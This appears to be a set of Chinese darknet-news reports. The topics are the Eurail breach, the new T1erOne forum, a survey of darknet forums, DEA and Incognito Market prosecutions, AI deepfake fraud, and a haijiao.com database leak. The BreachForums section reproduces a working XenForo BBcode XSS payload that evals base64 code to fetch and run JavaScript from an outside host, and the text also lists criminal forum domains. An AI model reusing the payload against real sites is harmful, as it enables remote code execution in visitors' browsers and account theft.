在攻击者将数百万欧洲铁路旅客的敏感记录发布到暗网犯罪市场上后,欧洲铁路公司(Eurail BV)1月份披露的未经授权的数据库访问事件演变成一场全面的身份盗窃危机。欧洲铁路公司证实,今年早些时候数据泄露事件中被盗的旅客数据目前正在暗网上出售。该公司披露这一消息,是其持续应对此次网络安全事件的一部分。
欧洲铁路公司(Eurail BV)在一份声明中证实:“此前报告的安全事件中受影响的部分客户数据已在暗网上出售,并且部分样本数据集已发布在Telegram上。我们正在继续调查事件的范围和影响。”事态升级使得数据泄露事件演变为一场可能危及数百万欧洲旅客身份的紧急事件。
欧洲铁路公司称其已立即采取措施进一步加强系统安全,正在实施额外的安全措施,并与外部网络安全专家合作调查此次事件。
Eurail BV是一家总部位于荷兰的公司,负责管理和销售欧洲铁路通票(Eurail Pass),使国际旅客能够凭借一张车票乘坐火车游览欧洲。该公司与数十家铁路和轮渡合作伙伴携手,提供覆盖30多个欧洲国家超过25万公里铁路线路的通行服务,简化了跨境铁路旅行。
欧洲铁路公司通告泄露事件的受害者 欧洲铁路公司(Eurail BV)证实,其系统遭到安全漏洞攻击,导致客户数据遭到未经授权的访问,其中包括欧盟委员会“发现欧盟”(DiscoverEU)项目的参与者数据。该公司表示,已迅速采取措施保护系统安全,并在外部网络安全和法律专家的协助下展开调查。
这意味着此次事件影响了所有持有欧洲铁路通票的乘客,以及通过该公司预订座位的乘客,包括通过合作伙伴渠道或分销商购买欧洲铁路通票或欧洲铁路联票的乘客。该公司尚未公布受影响的总人数,但欧洲铁路通票覆盖欧洲25万公里铁路,每年服务数百万旅客。
初步调查结果显示,此次数据泄露可能涉及订单和预订详情、基本身份和联系数据、旅行伙伴信息,在某些情况下还可能涉及护照号码和有效期。该公司在一月份发布的一份更新报告写道:“健康方面的数据。”
受影响的个人数据可能包括:
全名(姓名、姓氏)、出生日期或年龄、护照/身份证信息或复印件 邮政地址和居住国家/地区、联系方式(例如电子邮件地址和电话号码) 银行账户参考号(IBAN) 健康数据 该公司指出,其不存储支付卡数据或护照复印件。该公司已按照GDPR法规的要求通知了相关部门。护照号码、IBAN银行信息和健康数据的组合为复杂的身份盗窃提供了可乘之机,这种盗窃行为可能在最初泄露后持续数年之久。
直接从欧洲铁路公司(Eurail)或欧洲铁路通票公司(Interrail)购买旅行通票的乘客,其护照照片并未存储在公司系统中。然而,通过“探索欧盟”(DiscoverEU)项目获得通票的乘客则不同——该项目是由伊拉斯谟计划(Erasmus)资助的,旨在鼓励旅行者乘坐火车探索欧盟。
欧盟委员会确认,参与伊拉斯谟+计划的DiscoverEU旅行者的身份证复印件、银行账户信息和健康数据也可能遭到泄露。委员会已根据适用的数据保护法律法规,将此次数据泄露事件通报给了欧洲数据保护监管机构。
欧洲铁路公司提醒客户持续保持警惕 网络攻击发生后,欧洲铁路公司最初于1月10日公开披露了此次数据泄露事件。该公司承认攻击者未经授权访问了其客户数据库,并表示在最初发布通知时,没有证据表明客户数据被滥用或公开披露。然而,2月13日的更新证实了暗网销售活动,公司立场发生了巨大转变。
欧洲铁路公司已根据欧盟《通用数据保护条例》(GDPR)的要求向数据保护机构报告了此次事件,并根据需要通知了欧盟以外的其他数据保护机构。该公司可能面临监管机构对其持有敏感文件(包括护照复印件和健康数据)的时间长短的审查。
欧洲铁路通票公司建议乘客更新其铁路规划应用程序账户密码,并在任何其他使用相同凭据的平台上重置密码。乘客应密切关注银行账户活动,并立即向银行报告任何可疑交易。
鉴于护照号码、IBAN账户信息和健康记录等敏感信息泄露,受影响的旅客面临的风险远超一般的网络钓鱼攻击。护照数据可能被用于身份文件欺诈,而IBAN账户信息则可能被用于直接的金融诈骗。参与DiscoverEU项目的客户面临的风险最高,因为可能泄露的数据类别范围很广。
受影响的客户可以直接联系Eurail的隐私团队[email protected] ,以获取有关此次数据泄露对其特定账户影响的进一步指导。
欧洲铁路公司提醒客户,切勿向主动联系或声称自己是欧洲铁路公司工作人员的人员透露任何信息。该公司表示,一旦联系方式可用,将直接通知数据可能已被访问或泄露的客户。他们敦促客户警惕任何索取个人信息的可疑电话、电子邮件或短信,并强调欧洲铁路公司绝不会主动索取敏感数据。客户应更新其铁路规划应用程序的密码,检查相关的电子邮件、社交媒体或银行账户密码,监控账户是否存在异常活动,并将任何疑虑报告给银行。
“暗网下/AWX”前期报道,臭名昭著的俄罗斯暗网论坛RAMP已经被FBI查封,RAMP曾是允许讨论勒索软件的暗网论坛,受到勒索软件团伙的欢迎。最新情报显示,RAMP的替代品已经出现,新暗网论坛的名称为“T1erOne”(也被称为TierOne、t1eron3、Tier1),可以同时通过暗网和明网进行访问。
近日,有安全研究人员club1337(@club31337)发布推文表示“Ramp已死,TierOne万岁”,并给出了新的T1erOne网站的暗网与明网域名。“暗网下/AWX”对该推文进行了核验,确认T1erOne网站的暗网与明网域名均可以访问:
T1erOne的暗网域名:jprrin6bqe3flvtpyxkt4zsmzc3u6vvn7ahgtcbul224w3xn4h3gawid[.]onion
T1erOne的明网域名:t1eron3[.]vip
Ramp is dead. Long live TierOne.https://t.co/akRDXrnJvahttps://t.co/dm8re9gWcU pic.twitter.com/pEh2aUb78M
— club1337 (@club31337) February 12, 2026 “暗网下/AWX”尝试访问T1erOne论坛,发现该网站主要提供了登录和注册功能。打开该网站,显示了一个简洁的登录界面,包括用户名、密码输入框,以及注册链接,没有复杂的交互或可见的外部资源加载。可以明确的是,与常规暗网论坛不同,新的T1erOne论坛并非使用常见的开源PHP论坛程序如phpBB、MyBB或SMF等进行搭建,可能系背后的管理员独立开发。
初步分析,T1erOne论坛采用了前后端分离的网站架构,还使用了Socket.IO技术来实现实时双向通信。其明网页面使用了Cloudflare的CDN服务,这可能为执法部门找到其背后的真实服务器IP提供便利。
T1erOne论坛注册不需要邮箱验证,但注册该网站以后,需要管理员进行认证,访问所有页面均跳转提示:
Этот форум только по закрытому входу. Чтобы попасть, надо скинуть свои другие форумные акк (Рехаб, хсс, эксплойт) или заплатить 450$ на БТЦ / XMR кошелёк. Message an admin | Напиши админу
(本论坛为私密论坛。如需访问,您必须发送您的其他论坛账号(Rehab、XSS、Exploit)或向BTC/XMR钱包支付450美元。联系管理员 | 给管理员写信。)
本站(anwangxia.com)经过对页面的解析,发现了其后端的部分API接口如下:
/api/auth/register /api/auth/login /api/public/banners/image/2 /api/auth/me /api/public/settings /api/notifications /api/messages/unread-count 安全研究人员认为T1erOne与此前RAMP的活动关联,并正在通过新的T1erOne论坛监控该组织,这表明网络犯罪分子的攻击行为不回停歇,勒索软件的侵扰仍将继续。T1erOne论坛接下来将如何发展以及会不会步RAMP后尘,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
一提暗网,好多人脑子里还是老一套:黑市、贩毒、雇佣杀手啥的,电影看多了。但对我们这些做威胁情报的来说,它更像一个乱哄哄的地下集市,各种角色混在一起,信息流动快得惊人。到了2026年,暗网的各个角落已经碎片化得不行了——没有哪个暗网论坛能一统江湖,取而代之的是好几个各有专长的社区。有些专供新手混,有些是老鸟交易重型货色的,还有些纯粹是情报交换站。想知道你的公司数据会不会哪天被挂出来卖?得先搞清楚这些地方的门道。
一、Dread:地下世界的“风向标” Dread还是那个Dread,暗网里最像Reddit的存在。2026年了,它依旧是很多人每天必上的地方——不卖东西,主要就是聊。
这里什么话题都有:新漏出来的数据库谁有?哪个勒索团伙又在吹牛?某个工具是真神器还是骗钱的?诈骗犯被同行曝光的帖子也能刷屏。氛围有点像微博热搜,但全是黑灰产的版本。
为什么重要?很多大事件在主流媒体报道前,好几个月就在Dread上发酵了。勒索软件新变种、团伙内讧、甚至哪个管理员跑路了,这里往往是最先冒泡的地方。防御端来说,这里是抓“早期信号”最好的窗口——噪声多是多,但信号确实真。
二、BreachForums:数据泄露的“头条制造机” BreachForums这几年命真硬,克隆版本如雨后春笋般顽强,且爆发激烈战争。2026年初刚被爆出一次大规模用户数据库泄露,几十万账号暴露,社区一度乱套,但它还是顽强活了下来(或者说,不断有人接续重启了)。这地方就是数据泄露的“菜市场”——零售巨头、游戏公司、社交平台的dump,常常是这里最先挂出来。
热闹是真热闹,记者也爱盯着这里写报道。但别被表象骗了:一半帖子是假货、重复利用老数据,或者纯粹为了炒热度。真正有价值的情报,得会分辨上下文和卖家信誉。
对企业来说,这里是监控自家品牌泄露的首选站点的之一。很多公司在内部检测到异常前,好几天就在这里看到自家员工凭证被甩卖了。
三、XSS(以及它的“继承者们”):初始接入的“华尔街” XSS.is在2025年中被各国警方搞了一次大的国际联合执法行动,管理员被抓,域名也被查封。但俄罗斯语社区的生命力你懂的——2026年,类似的功能已经部分转移到RAMP、DamageLib这些继任者身上。老XSS的风格没变:重度商业化,卖的就是企业网络的“门票”——RDP、VPN、域管账号、云主机权限。
这里交易的不是小打小闹的个人账号,而是能直接横向移动的大企业访问权。很多后续的勒索攻击,第一步就是在这些地方买到的初始接入。
防御方得特别留意:等你内部告警响了,往往已经晚了三步。盯着这些初始接入经纪人(IAB)的动向,才能提前堵枪眼。
四、Exploit.in与CryptBB:技术硬核的“实验室” Exploit.in还在,定位没变:工具、漏洞、恶意软件的深度讨论区。这里不像前面几个那么喧闹,更像是技术宅的私人俱乐部。私有exploit、零日交易、新型恶意软件源码分享,都在这里悄悄进行。
2026年新冒头的CryptBB走得更极端——加密做得极严,准入门槛高,主要服务精英玩家。想看到下一代攻击技术在扩散前的模样?这俩地方是必看窗口。
普通公司可能觉得离自己远,但其实不然:很多“高级”技术过几个月就会流到低端市场,变成脚本小子都能用的货。
五、Nulled、Cracked、Altenen、LeakBase:大众化的“灰色集散地” 这几个论坛用户量大得吓人,门槛低,内容五花八门——从破解账号、盗刷教程,到现成的恶意软件工具包,应有尽有。Nulled和Cracked偏工具和破解,Altenen更重carding和欺诈,LeakBase则是纯数据泄露分享。
别看它们“低端”,影响力其实很大。新手从这里入门,老鸟也常来淘便宜货。很多主流恶意软件家族的变种,就是先从这些地方扩散开来的。
为什么防御端不能忽略?因为攻击大众化的趋势越来越明显——威胁不再只来自顶尖APT,很多普通企业的噩梦就是这些社区里随便一个脚本小子用现成工具捅进来的。
总结:最后说两句 2026年的暗网论坛生态,比以往任何时候都更分散、更韧性,“暗网下/AWX”认为,执法机构应该紧盯这些论坛,以随时掌握暗网新的动态。
旧的被端了,新的马上冒头;热闹的社区里噪音多,但真正的情报价值也高。做威胁情报的都知道:光靠技术挡是挡不住的,得懂对手在哪儿聊天、聊什么、谁在卖什么。盯紧这些地方,不是为了看热闹,而是为了在他们动手前,先知道他们想干嘛。
近期,美国缉毒局(DEA)在纽约东区联邦检察官办公室的合作下,宣布查封了200多个与一个总部设在印度的跨国犯罪组织(TCO)有关联的网站域名,并逮捕了与一个总部位于印度的贩毒集团有关联的主要嫌疑人,该集团在美国境内活动,通过暗网销售管制药品,据称至少造成6人死亡和4人非致命的过量用药事件。自2022年以来,DEA落基山分局一直在调查与这些非法网上药店有关的TCO。
DEA牵头的这项执法行动名为“熔毁行动”(Operation Meltdown),此次打击行动凸显了暗网和加密货币在阿片类药物贩运中日益严重的滥用,促使人们呼吁加强全球执法和监管。
为遏制美国境内非法网上销售管制药品的行为,美国缉毒局(DEA)查封了200个网站域名,这些域名隶属于一个总部设在印度、在美国活动的跨国犯罪组织。自2026年1月27日起,美国缉毒局(DEA)在全美各地的办事处开展了多项行动,逮捕了四名嫌疑人,并签发了五份立即暂停令(ISO)和一份责令说明理由令(OTSC)。这两项行政措施均针对DEA注册人员,旨在保护公众免受危害公共健康或安全的威胁。此外,美国政府还关闭了200多家在线药店,这些药店被指控在没有有效处方的情况下,处理了数十万份非法转售药品和假药的订单。此次与印度执法机构联合开展的“熔毁行动”(Operation Meltdown)表明,美国缉毒局已加强对非法毒品销售的打击力度,其中包括一些威胁公众健康的阿片类药物。
众所周知,芬太尼属于管制药品,与美国阿片类药物成瘾、过量服用和药物相关死亡的流行密切相关,甚至在特朗普政府的第一任期内,芬太尼就一直是其打击目标。在美国,管制药品只能由获得许可的药房凭有效处方出售,根据《管制物质法》(CSA),美国缉毒局(DEA)负责监管药房保管的管制物质的处理、储存和分发。《管制物质法》规定,药房只有在收到由执业医师出于合法医疗目的在其正常执业范围内开具的有效处方后,才有权配发管制物质。
而许多网站却不受此类限制,据当局称,这些网站销售掺有芬太尼等阿片类药物的假药或有害药物。非法网上药店通常使用美国网站地址和专业设计,以伪装成合法网站,但实际上并非如此。这些公司非法运营,蓄意欺骗美国消费者,让他们误以为自己购买的是合法、安全且受监管的药品。在“熔毁行动”(Operation Meltdown) 中被查封的许多网站都声称自己合法、总部位于美国,并已获得美国食品药品监督管理局(FDA)的批准,但美国缉毒局(DEA)的调查发现,这些网站的运营者往往与毒贩勾结,用假药或非法转售的药品来履行网上订单。这些假药通常含有芬太尼或甲基苯丙胺,服用后可能导致严重的健康风险,包括有害的副作用、治疗无效,甚至死亡。
2024年,美国缉毒局发布公共服务公告,警告美国民众非法网上药店数量激增。许多此类网上药店向美国不知情的顾客出售和运送含有芬太尼的假药,这些顾客误以为自己是从合法药店购买的合法药品。
调查人员认定,这些网上药店的经营者及其同谋非法向全美各地的顾客分发和运送非法转移的药品,且没有有效的处方,违反了《受控物质法》,并危险地渗透到旨在保护患者安全的封闭分销系统中。在调查过程中,美国缉毒局(DEA)确认了数千名通过这些网上药店购买药品的顾客。随后,DEA向公众发出了超过2万封信函,请求提供信息以支持这项正在进行的调查。
“这起案件表明,境外贩毒分子如何利用我们的医疗保健系统,躲在互联网背后,并利用美国境内的人员,以合法商业的名义贩运危险药物,”美国缉毒局局长特伦斯·科尔表示。“非法网上药店将毒药带入美国社区。他们销售假冒伪劣和未经批准的药品,漠视受害者的安危。此类行动能够拯救生命,保护美国人民。如果您运营这些网站、为其提供药品、转移资金、运输药品或协助其运营,我们将找到您,我们将摧毁您的犯罪活动,并将根据美国法律追究您的全部责任。”
美国缉毒局(DEA)利用其全球影响力,积极与印度政府执法伙伴合作,识别、调查并瓦解从事此类非法毒品贩运活动的危险犯罪组织。通过联合行动,DEA将继续从源头打击非法药品分销商,并坚定不移地致力于切断威胁美国公民公共健康和安全的非法药品流通渠道。
暗网、加密货币和全球执法 例如,六年前美国缉毒局(DEA)发布的一份报告指出,在中国开始实施出口限制后,印度是芬太尼前体和成品阿片类药物出口到墨西哥的主要来源地。美国情报部门促使印度关闭了位于印多尔的一家非法芬太尼工厂,几年前,孟买缉毒小组缴获了100公斤芬太尼前体化学品,并逮捕了四人。鉴于青少年吸毒成瘾问题日益严重,在印度境内秘密流通的管制药物令人担忧。
利用暗网、社交媒体和加密货币等渠道贩运阿片类药物和其他管制药品的模式,应该给执法机构敲响警钟。八年前,中国曾被视为芬太尼走私的中心,但此后已转向加强对出口的执法力度。其他一些非法网络交易的场所,例如加拿大和西欧,也一直是美国缉毒局(DEA)执法行动的重点,包括四年前关闭销售假冒或管制药品的网站。
在印度,古吉拉特邦港口的一系列毒品查获事件,以及有报告指出国际恐怖组织可能利用印度通过毒品交易筹集大量资金,用于实施诸如帕哈尔加姆游客大屠杀之类的袭击,都凸显了保持高度警惕的必要性。加密货币在非法交易支付中的作用也必须受到密切审查。
印度金融行动特别工作组已提出监管加密货币的建议,强制虚拟资产服务提供商保留部分交易的发起人和受益人信息。将某些类型的支付排除在加密货币之外或许是一种可行的过滤机制。清理暗网是一项艰巨的任务,需要国际社会的协调行动。
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
在数字时代,身份盗窃已从传统的密码窃取演变为一场高度技术化的对抗。网络犯罪分子越来越多地利用暗网中泄露的个人信息,并结合人工智能(AI)工具进行深度伪造,制造出逼真的虚拟身份。这不仅改变了犯罪模式,也加剧了数字安全领域的失衡——攻击者凭借技术优势迅速迭代,而防御方往往处于被动追赶的状态。专家将这一现象描述为一场“军备竞赛”,其核心在于AI赋予犯罪分子的不对称能力。
深度伪造技术的兴起与机制 深度伪造(deepfake)技术的成熟是这一转变的关键。早在2024年,“暗网下/AWX”就报道,暗网提供工具及服务,骗子利用人工智能工具进行深度伪造。只需受害者的一张静态照片或几秒钟的语音样本,AI算法即可生成高度逼真的视频或音频内容,使“虚拟人物”与真人难以区分。这种技术已广泛应用于绕过生物识别系统,例如面部识别或语音验证,从而在银行转账、政府服务申请等场景中实施资金拦截。
前白宫技术官员、现任Socure公共部门负责人的乔丹·伯里斯(Jordan Burris)指出,AI攻击的规模与速度令人担忧:在一秒钟内,算法可对数百万条身份记录发起探测,针对金融和公共服务系统进行自动化欺诈。他强调,犯罪分子不再依赖手动操作,而是通过AI代理系统实现大规模、精准的冒充。这意味着,即使是技术门槛较低的犯罪者,也能借助现成工具发动复杂攻击。
此外,这些伪造材料往往源于公开来源——社交媒体照片、公开演讲录音,或公共场所的监控片段。一旦获取,这些数据会在犯罪网络中流通、重组,并被用于多种攻击向量,形成一个高度组织化的地下生态。
暗网生态与专用AI工具的角色 暗网在这一生态中扮演核心角色。平台上流通的不仅是泄露数据,还有专为犯罪设计的AI工具,如DIG AI、WormGPT和FraudGPT。这类工具不同于通用AI助手,它们基于全球欺诈网络共享的情报库,提供针对性指导:从生成钓鱼脚本到优化诈骗流程。伯里斯将这种协调描述为一种结构化的商业模式,参与者通过信息共享实现效率最大化,最终目标直指普通用户的金融资产和个人信息安全。
深度伪造技术进一步放大了传统诈骗的危害。例如,在“浪漫诈骗”中,犯罪分子可通过实时视频交互建立信任,而受害者难以察觉异常。类似地,就业诈骗中也出现伪装求职者的案例,甚至涉及国家支持的黑客组织渗透企业远程团队。这些现象表明,AI不仅提升了犯罪效率,还降低了被识破的风险。
防御策略:以技术对抗技术 面对这一趋势,伯里斯主张采用预防性策略,即“以AI对抗AI”。企业应投资于实时检测系统,能够在攻击发生前识别伪造痕迹,而非依赖事后追溯。这种方法已被证明更有效,因为传统基于规则的安全协议难以应对AI的动态变异。
数据泄露的法律后果:GDPR框架下的索赔风险 与技术风险并行的,是数据泄露引发的法律责任。如果企业管理的个人信息在暗网流通,将显著提升大规模索赔的可能性。《通用数据保护条例》(GDPR)第82条明确规定,因违规导致物质或非物质损害的个人,有权向数据控制者或处理者索赔。其中,非物质损害的界定较为宽泛,欧盟法院已将其扩展至对数据失控的合理担忧,例如担心信息被滥用。
德国联邦最高法院近期的一起判决进一步澄清了责任边界。该案涉及一家IT服务提供商在测试环境中保留数据副本,后这些数据出现在暗网。法院裁定,即使处理合同已终止,数据控制者仍需获得明确删除确认,而非仅发出指令。这强化了企业对第三方处理者的持续监督义务。
品诚梅森律师事务所的桑德拉·格罗舍尔博士(Dr. Sandra Gröschel)和珍妮特·巴赫曼博士(Dr. Janett Bachmann)对该判决进行了解读。格罗舍尔认为,这一裁决为企业提供了实用指导,而非单纯加重负担。巴赫曼补充指出,暗网曝光虽增强了非物质损害的可信度,但索赔仍需受害者证明具体损害及其因果关系。同时,企业可通过展示合理的技术组织措施(如明确合同条款和删除验证流程)进行抗辩。该判决维持了举证责任的平衡,未开启无限制集体诉讼的大门,却无疑提升了企业的合规压力。
前瞻:构建更稳健的数字身份体系 人工智能与暗网的结合,正推动身份盗窃向自动化、规模化方向演进。这不仅威胁个人隐私与财产安全,也对金融机构和公共服务构成系统性风险。“暗网下/AWX”认为,长远来看,解决之道在于多层防御:技术层面加强AI检测,法律层面完善责任链条,社会层面提升公众意识。只有当防御机制与攻击技术同步演进时,数字身份才能真正实现可信与可控。企业若能及早行动,不仅可降低欺诈损失,也能在潜在诉讼中占据主动。
美国纽约南区联邦检察官办公室近日宣布在打击暗网毒品交易方面取得重大胜利。检察官杰伊·克莱顿透露,暗网毒品交易平台“隐秘市场”(Incognito Market)的台湾籍创始人兼运营者林睿庠(Rui-Siang Lin)因串谋分销毒品、洗钱以及串谋销售掺假和贴错标签的药品被判处30年监禁,并被勒令没收超过1.05亿美元的非法所得,同时接受5年的监管释放。
美国司法部发布的新闻稿称,这些罪行与林睿庠拥有和运营的“隐身市场”(Incognito Market)有关,该在线毒品交易平台在2024年3月关闭前售出了超过一吨的毒品。
台湾媒体称,林睿庠毕业于国立台湾大学信息管理系,在奥林匹亚数学比赛中获得铜牌。后来,他凭借自己的信息专业知识申请了外交替代服务,并被派往加勒比海“台湾友好国家”圣卢西亚服役。
24岁的林睿庠于2024年12月在纽约南区法院认罪。他于2024年5月休假返回亚洲途中,抵达纽约肯尼迪国际机场转机时被捕。检察官表示,林的“隐身市场”曾经是世界上最大的在线毒品交易市场之一。
克莱顿称林睿庠是全球最活跃的网络毒品贩运者之一。至少在四年时间里,这位出生于台湾的男子操控着数亿美元的暗网巨额电子商务交易。林睿庠于2020年10月推出了“隐身市场”(Incognito Market)暗网网站,利用Tor浏览器的匿名网络试图逃避执法部门的追捕。
克莱顿表示:“林的罪行、他造成的破坏、他所负责的巨量毒品、他领导的贩毒集团的复杂手段和方法,以及他所敛财的数百万美元,都是非同寻常的。虽然他从中牟取暴利,但他的罪行却造成了毁灭性的后果。他至少造成一人死亡,加剧了阿片类药物危机,给超过47万名吸毒者及其家人带来了痛苦。”
克莱顿说:“今天的判决向贩毒分子发出警告:你们无法躲在互联网的阴影下。我们想要传达的更重要的信息很简单:互联网、‘去中心化’、‘区块链’——任何技术——都不能成为经营毒品分销活动的通行证。”
从2020年10月到2024年3月关闭网站期间,林睿庠促成了超过1000公斤可卡因、1000公斤冰毒以及数百公斤其他非法毒品的销售。“隐身市场”(Incognito Market)还出售了4公斤掺有芬太尼的假冒合成止痛药羟考酮,导致一名来自阿肯色州的27岁顾客死亡。
据报道,Incognito Market拥有超过40万买家和1800家卖家。该平台处理了超过64万笔毒品交易,并在一个自行管理的加密货币“银行”中积累了超过1.05亿美元的资金。2024年3月,林睿庠涉嫌从该账户中窃取至少100万美元后关闭了该网站。他还试图勒索Incognito Market的客户和卖家,威胁要公开该网站的数据。
据报道,网名为“法老”(Pharaoh)的林睿庠亲自编写了Incognito Market的代码。与此同时,他还为圣卢西亚警方举办了为期四天的“网络犯罪和加密货币”培训课程,并继续经营着自己的网络毒品贩运活动。
美国地区法官科琳·麦克马洪称“隐秘市场”案件是她30年职业生涯中遇到的最严重的毒品案件。林睿庠于2024年12月16日在麦克马洪法官面前认罪,结束了这项涉及联邦调查局、纽约市警察局、国土安全调查局、食品药品监督管理局和其他主要联邦机构的复杂调查。2025年全年,检方都力主对林睿庠判处重刑,并在法庭文件中写道,林“应对Incognito Market的巨大危害负责”。他的编程技能使该网站易于使用,并且超出了执法部门的管辖范围。
正如克莱顿强调的那样,像Tor这样的暗网并非“神奇”或无懈可击。虽然洋葱路由网络可以为注重隐私的用户提供安全的通信和网页浏览,但它无法成为毒品贩运者、儿童性虐待相关犯罪或其他非法活动的永久“避风港”。
“隐身市场”(Incognito Market)的兴衰存亡 暗网市场Incognito Market于2020年至2024年间运营,在全球范围内售出了价值超过 1.05 亿美元的毒品。该网站由化名“法老”的林睿庠 (Rui-Siang Lin) 运营,贩运了大量可卡因、冰毒和其他毒品,包括掺有芬太尼的药丸。林掌控着整个运营流程,从供应商到客户,无一例外。
林睿庠拥有深厚的技术功底,亲自编写了Incognito Market的代码。林睿庠在圣卢西亚生活和工作期间,作为台湾政府的助理技术员,仍然领导着这个平台,他甚至还在脸书上吹嘘自己为圣卢西亚警察举办了为期四天的“网络犯罪和加密货币”培训。
这个暗网交易市场就像一个精致的网上毒品商店。用户登录后,浏览成千上万的商品信息,并使用加密货币支付。卖家每笔交易需支付5%的佣金,平台内置加密货币“银行”来处理支付,并确保买卖双方的匿名性。
Incognito Market允许约1800家商户向超过40万个账户的客户群销售商品。联邦调查局称,该网站促成了约64万笔毒品交易。
作为Incognito Market的主要管理员和运营者,林睿庠负责监督平台的所有运营,并管理网站的供应商、客户和员工。除了非法毒品外,该网站还出售据称合法的药物,例如羟考酮、阿普唑仑等。
林睿庠于2024年3月关闭了该网站,并从平台上的买家那里窃取了至少100万美元。他还威胁平台上的卖家和买家,警告他们如果不付款,就会公布他们的用户历史记录和加密货币地址。 林在网站发了一张截图,上面写着“没错,这就是敲诈勒索!!!”检察官称,该记录也被纳入量刑考虑范围。
FBI如何发现Incognito Market背后的林睿庠 2022年9月,美国阿肯色州一名27岁男子因服用从Incognito Market购买的“Oscondine”而死亡,美国司法部将这起死亡事件与隐身市场直接联系起来,联邦调查局开始调查该平台。
2023年,卧底执法人员也在平台上购买了类似的药片,检测结果也是芬太尼。执法机构于2023年7月和8月执行了搜查令。
调查人员发现,林睿庠通过在线域名注册商Namecheap购买了一个互联网域名,使用以自己名字注册的加密货币钱包进行支付,他与Namecheap进行了四笔交易。该Namecheap账户与林睿庠的台湾电话号码、台北地址以及包含他名字的电子邮件地址相关联。
检方透露,林睿庠于2023年10月使用同一电话号码和电子邮件地址申请美国签证,并提交了本人照片。此外,他还使用台湾驾照作为身份证明注册了另一个加密货币账户。
近日,“暗网下/AWX”发现,知名中文成人网站海角社区发生一起大规模数据泄露事件,一名威胁行为者在DarkForums泄露了一个数据库,其中包含大约1570万条用户记录。
发布该数据库的黑客昵称是“Tanaka”,帖子名为“China – haijiao.com 15.7M User DB”。在帖子内,他介绍了数据库信息,贴上了样本数据,并给出了具体的下载地址。根据介绍,数据格式是Json格式,泄露时间是2022年,从样本分析,数据可能是从Elasticsearch导出,包含如下字段:
_id; _index; _score; avatar; cash_count; cert_professor; cert_professor_expire; cert_video; cert_video_expire; certified; certified_expire; comment_count; created_at; deleted_at; description; email; email_verified; famous; famous_weight; fans_count; favorite_user_count; forbidden_end_time; id; last_login_ip; last_login_time; nickname; parent_id; password; pay_password; phone; popularity; role; sex; status; tags; topic_count; updated_at; username; video_status; vip; vip_expires_time; voice_status
从字段看,泄露用户数据包括用户名、电子邮件地址、手机号码、密码(哈希加密)、最后登录IP与时间以及其他与帐户相关的详细信息,例如地点和兴趣。
访问下载地址,提示数据上传时间为2023-08-13 18:49:23,文件名是“15.7M-CN-haijiao.com-Chinese-Porn-Forum-UsersDB-json-2022.zip”,压缩包大小为1.47 GB,未压缩前是14.7 GB。
海角社区是一个中文成人网站,主要涉及成人视频、论坛及相关敏感内容,以泄露各种乱伦,通奸,强奸,偷拍等非自愿色情图片与视频为卖点。截至目前,该社区仍在正常运营,且用户活跃度较高。虽然是前期数据,但是数据量如此之大、免费开放下载使得这起泄露事件十分严重。“暗网下/AWX”提醒,网络犯罪分子可能会针对该数据定向钓鱼或者诈骗,请务必注意防范!
